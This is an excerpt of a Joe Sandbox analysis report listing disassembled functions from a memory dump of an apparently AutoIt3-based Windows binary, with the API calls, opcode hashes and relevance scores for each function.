Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 1214319e34493d53010bb3a0fd96a9260d6701f4f6661f601cca612c19f31912
Instruction ID: d77df0b9df6fd8ec50925b6ae4ee23411c9e075c943099a7e1de7b3b92c2a915
Opcode Fuzzy Hash: 1214319e34493d53010bb3a0fd96a9260d6701f4f6661f601cca612c19f31912
Instruction Fuzzy Hash: A2115172500109AFCB04EBA4CD46DAEB7F9EF14310B144065F902F72A2DF719E10DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F296F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00F29719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F2972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F29741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F2975C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a6055ed68093884d7cd5bd5664e87da730c30e82fdf31d7e3b4278575fb2f697
Instruction ID: b33b91bc9dc113192c9eade3e751a02d52b32d559e8e9951e1a3c6439032f175
Opcode Fuzzy Hash: a6055ed68093884d7cd5bd5664e87da730c30e82fdf31d7e3b4278575fb2f697
Instruction Fuzzy Hash: 24114C39900218FFDB10DF95CD84E9DBBB8FB48710F204095E900B7250D6716E10EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

DefDlgProcW.USER32(?,00000020,?), ref: 00ED16B4
GetClientRect.USER32(?,?), ref: 00F0B93C
GetCursorPos.USER32(?), ref: 00F0B946
ScreenToClient.USER32 ref: 00F0B951

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: da14cf328e5ef60f25f55955e3c1c6e9d1441551bfa3dcf92c89eb96091a8d07
Instruction ID: 5e2b408f301a23427602664cfd72c5734ebdddc351fd90406e22221307300856
Opcode Fuzzy Hash: da14cf328e5ef60f25f55955e3c1c6e9d1441551bfa3dcf92c89eb96091a8d07
Instruction Fuzzy Hash: 23115535A00119BBCB00EF98D885DFE77B9EB04300F140496F921E7240C731BA52EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00ED214F
GetStockObject.GDI32(00000011), ref: 00ED2163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 29c90c29f44933f8417ac1283b64c323d06b5b51f3195a949355c2c68c45bc2e
Instruction ID: 3b911985d8f4a4879fb05d4f041323100d3b24fc78db47d4e19b8af7b3579497
Opcode Fuzzy Hash: 29c90c29f44933f8417ac1283b64c323d06b5b51f3195a949355c2c68c45bc2e
Instruction Fuzzy Hash: 20118B7210220DBFDF024F90DC44EEBBB69EF68358F14411AFB1462260CB719C61ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F31941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F3195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F31983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F3198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00F304EC,?,00F3153F,?,00008000), ref: 00F319C0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 2551e0088be397177736dbf97486c49a3222240074941450538a3989772406bf
Instruction ID: 83c250e6b26a503ed725a8217b3068723384e1a47e9d88e015633b755180930f
Opcode Fuzzy Hash: 2551e0088be397177736dbf97486c49a3222240074941450538a3989772406bf
Instruction Fuzzy Hash: A5113C31D0551DDBCF009FE5D958BEEBB78FF09761F114155E980B2241CB309650AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F5E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F5E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00F5E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00F5E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00F5E234

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: c795461265b7fcf0e675441f199326794e93e681457581e535a615459277731c
Instruction ID: 5f5f17df5b6d0380d84a75597b9cf1ae4a2e7b1a18b2087906ab50d815a90361
Opcode Fuzzy Hash: c795461265b7fcf0e675441f199326794e93e681457581e535a615459277731c
Instruction Fuzzy Hash: FA1152756053089BE3348F51DD08F937BBCEB00B05F108559AB26D6054DBB0E608BB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F071E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00F0720B

Part of subcall function 00F078F2: __fltout2.LIBCMT ref: 00F0791B

__cftog_l.LIBCMT ref: 00F07231
__cftoe_l.LIBCMT ref: 00F07263

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 5bd95c3b7c038162ffb9d7454effcd39db6d1948b7179f01deb4ea5df1ffda73
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 48019E3284824EBBCF126E84CC01CEE3F62BB19350B188595FA1858171C336E9B1BF81

Uniqueness

Uniqueness Score: -1.00%

Function 00F5B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00F5B956
ScreenToClient.USER32 ref: 00F5B96E
ScreenToClient.USER32 ref: 00F5B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F5B9AD

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 9aa9bc957516817ab4c5829a858f9c981949d56f52f810bfbbf11f5ef4b21fa8
Instruction ID: a8dc85bc2285c64c74f36f22aa754a0b90bec7dde61737b66686744b8b6c2b9a
Opcode Fuzzy Hash: 9aa9bc957516817ab4c5829a858f9c981949d56f52f810bfbbf11f5ef4b21fa8
Instruction Fuzzy Hash: A61163B9D0420DEFDB41CF98C884AEEBBF9FB48310F104156E924E3210DB71AA659F50

Uniqueness

Uniqueness Score: -1.00%

Function 00F5BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F5BCB6
_memset.LIBCMT ref: 00F5BCC5
CreateProcessW.KERNEL32 ref: 00F5BCF4
CloseHandle.KERNEL32 ref: 00F5BD06

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 4b9301c0a95b995543ea4d20164a7afa3a644a5139e38ada9709396b5f4026a8
Instruction ID: 2572ea82dac7ea45895c0a933f6024e3799611e90e13325eb756193fc0c0eb69
Opcode Fuzzy Hash: 4b9301c0a95b995543ea4d20164a7afa3a644a5139e38ada9709396b5f4026a8
Instruction Fuzzy Hash: CFF0F4B254030C7FF65027655C06FB73A5DDB0A799F001422FB08E5192DFB55811A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00F37195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00F371A1

Part of subcall function 00F37C7F: _memset.LIBCMT ref: 00F37CB4

_memmove.LIBCMT ref: 00F371C4
_memset.LIBCMT ref: 00F371D1
LeaveCriticalSection.KERNEL32(?), ref: 00F371E1

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 307b039b95f3a47cfd450dd5a3d0e83bf2316d2e55d05b648da7e961c40eb996
Instruction ID: ed146c794a2514b4967f65cd2a3193fcfb40551f1d2599168706abdccd6ba8aa
Opcode Fuzzy Hash: 307b039b95f3a47cfd450dd5a3d0e83bf2316d2e55d05b648da7e961c40eb996
Instruction Fuzzy Hash: F6F05476200104ABCF016F55DC85A5ABB69EF45360F04C051FE085E21BCB75A911EBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00ED16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED1729
Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1738
Part of subcall function 00ED16CF: BeginPath.GDI32(?), ref: 00ED174F
Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F5C3E8
LineTo.GDI32(00000000,?,?), ref: 00F5C3F5
EndPath.GDI32(00000000), ref: 00F5C405
StrokePath.GDI32(00000000), ref: 00F5C413

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: d671a075a11ba8b199f4811f9ed5f68376acd2fefc5eddda26b399da8109d8b1
Instruction ID: a110d7a29fd6a36e43366a165fa0dfbe81dbac3a2d4dc74f053cd07e521aeeb1
Opcode Fuzzy Hash: d671a075a11ba8b199f4811f9ed5f68376acd2fefc5eddda26b399da8109d8b1
Instruction Fuzzy Hash: 84F0BE3100531CBBDB126F50AC0DFCF3F59AF06321F248000FA22211E18BB55555EBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00F2AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00F2AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2AA82
GetCurrentThreadId.KERNEL32 ref: 00F2AA89
AttachThreadInput.USER32(00000000), ref: 00F2AA90

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 47252a4f5841dd57abc4b964a5c9c6d24015b0ec09fc28c2679d9b98e95301ff
Instruction ID: a8a2065f69b1a1950243c4e54bf6eac54f59b1a2c09d20debbb8f508d3e9b70c
Opcode Fuzzy Hash: 47252a4f5841dd57abc4b964a5c9c6d24015b0ec09fc28c2679d9b98e95301ff
Instruction Fuzzy Hash: C2E0393154122CBBDB215FA2ED0CEEB3F1CEF127A1F108011F51984090CAB68550EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00ED25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00ED260D
SetTextColor.GDI32(?,000000FF), ref: 00ED2617
SetBkMode.GDI32(?,00000001), ref: 00ED262C
GetStockObject.GDI32(00000005), ref: 00ED2634
GetWindowDC.USER32(?,00000000), ref: 00F0C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F0C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00F0C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00F0C203
GetPixel.GDI32(00000000,?,?), ref: 00F0C223
ReleaseDC.USER32 ref: 00F0C22E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 7ecfad7fad9fba0635fd6a03f4e9377258095cd574634d3283d71aff210ff2d2
Instruction ID: 731b51af6588a8e1c660dbc042d5a2ce1cb0f882102da25c61772cbcff32c6f6
Opcode Fuzzy Hash: 7ecfad7fad9fba0635fd6a03f4e9377258095cd574634d3283d71aff210ff2d2
Instruction Fuzzy Hash: 34E0E531504248BBDB215F64AC497D93B11EB16336F148366FA79580E18BB14994FB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F29330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00F29339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00F28F04), ref: 00F29340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F28F04), ref: 00F2934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00F28F04), ref: 00F29354

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: ca676f9336bc5474f386f880de275c3e8558fceba0dcf29db269d9c9a2bfc097
Instruction ID: 0bca08c5614838cd8e33aacc3b3b4c244c5fb6125ab06d6675150935de96bcd1
Opcode Fuzzy Hash: ca676f9336bc5474f386f880de275c3e8558fceba0dcf29db269d9c9a2bfc097
Instruction Fuzzy Hash: 83E08632A01225AFE7205FB16D0DB573B6CEF507A2F204818F255CA090EAB49444E754

Uniqueness

Uniqueness Score: -1.00%

Function 00F10679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F10679
GetDC.USER32(00000000), ref: 00F10683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F106A3
ReleaseDC.USER32 ref: 00F106C4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 44e7a14d1640c83b44ab8a8a7777d3b6fbc005a94b156dc7714fa5cd3a4f3a55
Instruction ID: e5f7652b1fdd890eeb1ecb8f6b4a2dd322fd91e0f68ac3c691352447ad62a89b
Opcode Fuzzy Hash: 44e7a14d1640c83b44ab8a8a7777d3b6fbc005a94b156dc7714fa5cd3a4f3a55
Instruction Fuzzy Hash: B9E01271800209EFCB015F60D908B9E7FF1EB9C310F218005F869A7350DFB54551AF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F1068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00F1068D
GetDC.USER32(00000000), ref: 00F10697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F106A3
ReleaseDC.USER32 ref: 00F106C4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: af5315884c1fb26411de9fc4b710b7589c21c6b5d7401323ace9c45242814e1b
Instruction ID: c1a00614b82b65a899c8a215ce39723ec40e8c822a9e78083b884d8a9251d1f5
Opcode Fuzzy Hash: af5315884c1fb26411de9fc4b710b7589c21c6b5d7401323ace9c45242814e1b
Instruction Fuzzy Hash: EFE01AB1800209AFCB019F60D908A9E7FF2EB9C310F208005F969A7350DBB99552AF50

Uniqueness

Uniqueness Score: -1.00%

Function 00EF5FCC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00EF5FCD

Part of subcall function 00EF9BF4: GetLastError.KERNEL32(?,00EF1003,00EF8D5D,00EF59C3,?,?,00EF1003,?), ref: 00EF9BF6
Part of subcall function 00EF9BF4: __calloc_crt.LIBCMT ref: 00EF9C17
Part of subcall function 00EF9BF4: __initptd.LIBCMT ref: 00EF9C39
Part of subcall function 00EF9BF4: GetCurrentThreadId.KERNEL32 ref: 00EF9C40
Part of subcall function 00EF9BF4: SetLastError.KERNEL32(00000000,00EF1003,00EF8D5D,00EF59C3,?,?,00EF1003,?), ref: 00EF9C58

CloseHandle.KERNEL32(?,?,00EF5FAC), ref: 00EF5FE1
__freeptd.LIBCMT ref: 00EF5FE8
ExitThread.KERNEL32 ref: 00EF5FF0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
String ID:
API String ID: 4169687693-0
Opcode ID: e8e56cc06696f8efcb3304c68b67f83c2e333e05c41bc094f2331e2cd5a95110
Instruction ID: a4fcca7eb11f94fb35a8169424be1675b01ead9e0aab06af4b214b7fc19144f4
Opcode Fuzzy Hash: e8e56cc06696f8efcb3304c68b67f83c2e333e05c41bc094f2331e2cd5a95110
Instruction Fuzzy Hash: BBD0A733402E5887C2322764AC0EF3A32505F00B26F245244F7B5756F18FA188028645

Uniqueness

Uniqueness Score: -1.00%

Function 00F2BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00F2C057

Strings

Container, xrefs: 00F2BFD4
AutoIt3GUI, xrefs: 00F2BFCF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
